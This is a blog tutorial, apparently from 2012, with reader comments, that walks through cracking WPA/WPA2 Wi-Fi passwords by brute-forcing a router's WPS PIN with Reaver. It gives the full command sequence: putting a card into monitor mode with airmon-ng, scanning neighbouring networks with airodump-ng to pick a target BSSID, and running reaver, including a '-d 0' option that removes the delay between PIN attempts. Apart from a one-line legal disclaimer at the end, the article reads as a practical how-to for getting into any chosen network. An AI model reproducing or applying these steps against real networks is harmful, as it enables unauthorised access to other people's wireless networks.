With the WPS (Wi-Fi Protected Setup) security flaw, it is really easy for anybody with a Linux computer with a wireless network card capable of packet injection  and a lot of patience to crack a WPA or WPA2 passwords . WPS exists today in nearly every router and access point out there.

With REAVER, we are going to send a brute force attack on a WPS router with WPA or WPA2 and thus obtain the Wifi password in a 10 hours window depending on the router.

Tools Needed:

  • A computer with a packet injection capable  wireless network card or a USB wireless adapter
  • A Live Linux Cd or USB Flash Drive (we will use Backtrack 5 R2 witch comes with the REAVER already installed)
  • The REAVER utility (if you are not using Backtrack 5 R2)
  • A WPA or WPA2 protected Wi-Fi setup with a WPS capable router

Now, let’s get down to business:

  • The very next step is to boot from your Live Backtrack 5 R2 CD or USB Flash drive (or any Linux flavor)
  • Next, install Reaver if you are not running Backtrack 5 R2
  • Next, at the command prompt, type the following command and hit Enter: iwconfig

Click on Image to enlarge

Note: This command should output the list of your network interfaces and details about the ones with wireless capability. Make note of the wireless ones: Examples: wlan0 or wifi0

  • Next, type: airmon-ng start XXXX (XXXX being your wireless interface)  Example: airmon-ng start wlan0

Click on Image to enlarge

Note: This command basically puts the wireless interface in monitor mode. Make a note of your monitor interface name. It should be something like mon0 or mon1.

  • Next, type: airodump-ng wlan0
  • If the above command does not work, type: airodump-ng mono (mon0 being the monitor interface we discovered in the previous step.

Click on Image to Enlarge

Note: This command will display a list of all existing neighborhood networks’ SSIDs. Notice that it will also display non-broadcasted SSIDs. When you see the SSID of the network you want to crack, hit CRTL+C to stop the scan. Take note of the BSSID which is basically the mac address of your access point (or wireless router).

Now lets start cracking up this wireless password.

  • The syntax of the command we are going to type next, looks somewhat like this

reaver -i monitored_interface -b router_bssid -vv

For instance if your monitored interface is mon0 and your router or access point bssid is AA:BB:CC:DD:EE:FF, the final command should be the following one:

reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv

Click on Image to enlarge

After hitting enter, the cracking process will begin. The length of this process varies depending on the type of router or access point that you have.

You can also pause the process by hitting CTRL+C at any time. this will break the process but saves the progress for when you run the command again.

After reaver is done cracking the password , it will display a screen like the following one


We have had quite a few feedbacks on the fact that the REAVER command that we have issued was not working for some routers/access points.

ORIGINAL COMMAND: reaver -i monitored_interface -b router_bssid -vv

If this command does not work for you, we can add the option “d 0” it. This option suppresses the delay of 1 second that REAVER has between the pin attempts.

UPDATED COMMAND: reaver -i monitored_interface -b router_bssid -vv -d 0

Example: reaver -i mon0 -b AA:BB:CC:DD:EE:FF -vv -d 0


Most of the routers/access points out there won’t like the delay suppression, so don’t use it unless the original command isn’t working for you!!


This article is for education and testing purpose only. Using this method to crack someone else wireless network is against the law. Do so at your own risk.

  1. September 7, 2012 at 2:17 am

    Reblogged this on Gigable – Tech Blog.

  2. September 8, 2012 at 8:40 am

    Reblogged this on Welcome To Prasad Linux Blog.

  3. January 11, 2014 at 4:43 am

    Your way of explaining everything in this post is in fact
    pleasant, every one can simply know it, Thanks a lot.

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: